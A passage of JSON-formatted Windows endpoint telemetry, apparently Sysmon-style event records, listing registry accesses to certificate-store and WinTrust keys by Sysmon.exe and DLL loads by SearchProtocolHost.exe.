"HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570916840000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570916840000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570916840000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570916840000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570916840000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570916840000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570916840000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570916840000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570916840000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570916840000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883570916840000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883570916840000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883570916990000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "image_load", - "image_name": "shell32.dll", - "image_path": "C:\\Windows\\System32\\shell32.dll", - "pid": 3560, - "process_name": "SearchProtocolHost.exe", - "process_path": "C:\\Windows\\System32\\SearchProtocolHost.exe", - "timestamp": 131883570916990000, - "unique_pid": "{42FC7E13-CAE3-5C05-0000-00104C8E4E01}" - }, - { - "event_type": "image_load", - "image_name": "cfgmgr32.dll", - "image_path": "C:\\Windows\\System32\\cfgmgr32.dll", - "pid": 3560, - "process_name": "SearchProtocolHost.exe", - "process_path": "C:\\Windows\\System32\\SearchProtocolHost.exe", - "timestamp": 131883570916990000, - "unique_pid": "{42FC7E13-CAE3-5C05-0000-00104C8E4E01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570916990000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570916990000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570916990000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570916990000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570916990000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570916990000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570916990000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570916990000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570916990000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570916990000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570916990000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570916990000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570916990000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570916990000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570916990000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570916990000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570916990000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570916990000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570916990000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570916990000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570916990000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570916990000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570916990000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "image_load", - "image_name": "mssph.dll", - "image_path": "C:\\Windows\\System32\\mssph.dll", - "pid": 3560, - "process_name": "SearchProtocolHost.exe", - "process_path": "C:\\Windows\\System32\\SearchProtocolHost.exe", - "timestamp": 131883570916530000, - "unique_pid": "{42FC7E13-CAE3-5C05-0000-00104C8E4E01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883570916990000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883570916990000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 3560, - "process_name": "SearchProtocolHost.exe", - "process_path": "C:\\WINDOWS\\system32\\SearchProtocolHost.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\SyncRootManager", - "registry_value": "SyncRootManager", - "timestamp": 131883570916990000, - "unique_pid": "{42FC7E13-CAE3-5C05-0000-00104C8E4E01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883570916990000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "image_load", - "image_name": "authz.dll", - "image_path": "C:\\Windows\\System32\\authz.dll", - "pid": 3560, - "process_name": "SearchProtocolHost.exe", - "process_path": "C:\\Windows\\System32\\SearchProtocolHost.exe", - "timestamp": 131883570916680000, - "unique_pid": "{42FC7E13-CAE3-5C05-0000-00104C8E4E01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570917150000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570917150000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570917150000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570917150000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570917150000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570917150000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570917150000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570917150000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570917150000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570917150000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570917150000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570917150000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570917150000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570917150000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570917150000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570917150000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570917150000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570917150000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570917150000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570917150000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570917150000, - "unique_pid": 